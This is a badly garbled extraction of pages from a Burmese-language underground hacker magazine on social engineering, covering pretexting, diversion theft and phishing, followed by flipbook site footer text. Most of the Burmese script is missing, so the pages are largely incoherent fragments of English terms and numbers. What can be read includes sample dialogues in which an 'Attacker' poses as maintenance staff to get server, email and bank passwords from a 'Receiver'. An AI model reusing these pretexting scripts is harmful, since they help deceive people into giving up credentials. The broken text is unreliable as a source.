93 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၅။ Social Engineering Attacker Social Engineering - (၆) ။Social Engineering Attacker ။၄ ( ) Pretexting ( ) Diversion theft ( ) Phishing (ဃ) IVR (Interactive Voice Response) or Phone Phishing ( ) Baiting ( ) Quid Pro quo Pretexting ၆။ Pretexting Social Engineering attacker Network System ႔ Authority ၓ ႔ ႔ ၍ ။ ႔ Authority ၓ ။ Attacker ၏ Data ။ ၏ Login Password ID Number ၊ IP Address ႔ ၇။ Pretexting ႔ Company ၊Password data Server User Name Attacker Hacking Technical ၍ ။႔ ႔ ၏ Username၊ Password Social Security Number၊ Telephone Number၊ Date Of Birth ႔ ။ Attacker Company ႔ ႔ ။၄ ႔ ။ Company ၏ Reception ႔႔ Attacker: Sharp Company ။ Receiver: ။ Sharp Company ။ Attacker: ၊ ႔ Sharp Company Network Sevice IP Pro Company ။ Database ႔ Maintainence Company Power By Union Of Underground Myanmar Hackers

94 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Server Backup ႔ Username၊ Password Login ႔႔ ။ ႔ ။ Administrator Receiver: Server Administrator ။ ၉..... ။ Attacker: IP (၃) ။ Receiver: ။ (၅) ။ ။ ။ Attacker: ႔ Handphone ၐ ႔ ႔ ႔ ။ ႔။ ။ Receiver: ။ ၁-၅၇... ။ ၍ ၁ Attacker: Administrator ။ Receiver: ။ ။ Attacker: ႔။ ႔ ႔။ ။ Receiver: ၊ ၉.... ။ Attacker: ။ RECEIVER: ။ ၁….. ။ ATTACKER: ၊ Server Duty RECEIVER: ၊ Server Room Phone Number -၂၂၃ ။ ။ ATTACKER: Server Room ႔႔ ႔။ RECEIVER: ၁။ Administrator ။႔ ။ ATTACKER: ၊။ ႔႔ ။ ၈။ Attacker Pretexting Social Engineering company ၏ Database Server Username၊ Password ။၎ ၍ ၃ ။ ၉။ Administrator ၃ ၁ ႔ ၍ ႔ ႔ ႔၊ ၍ ႔ ။ ႔ ဏ၏ Password Pretexting Social ၊ဏ ၊ ၊ ႔ Power By Union Of Underground Myanmar Hackers

95 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Engineering ။၄ Attacker Username Password ။ ၁။ ၍ Network Administrator ၍ User Name Password ။ Attacker ။ UserName Network Administrator ၊ ႔ ။ Password - UserName Password ATTACKER: ၊။ RECEIVER: ATTACKER: ၊S R D t ။ RECEIVER: ATTACKER: ။ RECEIVER: ။ ATTACKER: RECEIVER: ႔ Sever ႔ ATTACKER: ။ User Name ႔ Password ။ RECEIVER: ATTACKER: Sever Restart ။ RECEIVER: ဏ ။ Restart ။ ။ ATTACKER: ဏ ။ .............. ။ ။ ။ User Name Password ႔ Sever ။ ႔။ User Name ႔ Password ဏ ။ ႔။ ။ ။ Username mgkoko Password ၂၂၃ ။ ။ See You Tomorrow ။ RECEIVER: Ok Ok ။ ၁၁။ Attacker ၏႔ ၊ ႔ ၍ Pretexting ။ Social Engineering User Name ၊ Password sever attacker company () ။ administrator login username Password ၍ ၍ ။ၐ Power By Union Of Underground Myanmar Hackers

96 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH pretexting social engineering ။၍ E ။႔ ၍ Network Administrator pretexting social engineering attacking network Operator ၊ Operator ၊ network duty ။ ၁၂။ Pretexting Personal ။ ။ Personal ၍ Att ။ Attacker ၏႔ ၍ ။႔ ၍ ။၌ ဏ၍ Personal ၊ ၊ဏ ႔ ။႔ ။ ၍႔ User Name ။ ၏ Password ။ ၏၍ P ။႔ Pretexting ၍ ၎၏ ၊ Email ႔ ။႔ ၍P t t ၍ - ATTACKER: ၊ ႔ ။ ႔။ RECEIVER: ၊ ႔ ၊ ATTACKER: ။ RECEIVER: Attacker ၊ ႔။ ၎ ၏ ။ Attacker: save ႔။ ႔႔ ႔ Mail ႔ ႔ ။ ႔။ ။ ႔။ Password) ၊ Mail Password ( ။ ၁၃။ ၏ Password Attacker ၏ Mail ၊ ႔။ Power By Union Of Underground Myanmar Hackers

97 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၁၄။ Pretexting ၍ Personal Online Banking ။ Attacker ၎၏ ၍ ၏ Bank ႔ Passwo ၍ Password ၍ ။ Bank Password Personal ၍ ။ Attacker Bank ။၎ Bank Password ၏ Bank Account ႔ ။ ၁၅။ Pretexting ၊ ။ Pretexting ၍ ၆ ။၎ ႔ - () ၏႔ Personal Website ၊ Emai ႔၊ ။ () ၊ Password ႔၏ ၊ ႔၏ ၊ ၊႔ ၊႔ ႔ ။ ( ) ၏႔ ဏ႔ ၊ Pretexting ။ (ဃ) ၍ M ။ ၊ () Pretexting ၏ ၍၎ ႔ Pretexting ။ ( ) ႔၏ ၊ ၊ ၏ ႔ ။ ၁၆။ ႔ ၊ ႔၏ ၎႔ ၍ Pretexting ၏႔ ၎႔ ။ ၍ Password ၊ ၍႔ ။ ႔၏ Power By Union Of Underground Myanmar Hackers

98 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။၎ Password Account ။Pretexting ႔ ။ ၒ ။ Attacker ၎ Diversion Theft ၁၇။ Diversion Theft Social Engineering Corner Game ႔ Round the ။ ၍ Corner Game ၐ ။၎ ၍ ႔ ။ Diversion Theft ၏ Attacker ၊႔ Pretexting ၐ Diversion Theft ႔ ႔ ။၎ ၐ - ၎ ႔ ဏ၏ ၍။ ဏ႔ ။ ႔ Attacker ၍ Diversion Theft Attacker: ႔ ။ Reciver: ။႔ ႔ ။ Attacker: ႔ ႔။ Reciver: ။ ႔ Attacker: ။ ႔ ႔ဏ ႔ ။ ႔ ၊ ၊၅ ၈ x ၈၁ ႔႔ ၇၃ x ၇၄ ႔။ ႔ Reciver: ႔ ။ ၊႔ Pretexting ။ ၁၈။ Attacker ။ Attacker: ႔ ၊ ၁၂/ ( )၁ ၁ ၂၆ ။ Power By Union Of Underground Myanmar Hackers

99 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Reciver: ဏ ။။ ႔၂ Attacker: ႔။ Reciver: Attacker: ။႔ ။႔ ။ ၄ /၁၂၃၄ ။ ။ ၁၉။ Attacker ႔ ႔ ။ ႔႔ ။၎ ၍ ။ ။ Diversion Theft ၍ ၍ ဏ႔ ႔ ၍ Pretexting ႔ ၏ ၍ ။႔ ၍ ။ဏ ။ Attacker ၍ ။ဏ Attacker ။ ဏ႔ ။။ ႔ ၎ ၊႔ ၍ ။ Attacker ႔ ႔ ၎၏ ။ - ၍႔ Reciver: ။ ဏ။ Attacker: ႔။ Reciver: ။ Attacker: ႔ ၁၂/ ( )၁ ၁ ၂၆ ။ ၂ ။ Attacker ၍ ဏ႔ ၊ ၍ ။၎ ၍ ။ Reciver: ။ ႔။ Power By Union Of Underground Myanmar Hackers


kophakan2213

B24565
Share
Like this book? You can publish your book online for free in a few minutes!
Create your own flipbook

TOP SEARCH

business design fashion music health life sports home marketing children

RELATED PUBLICATIONS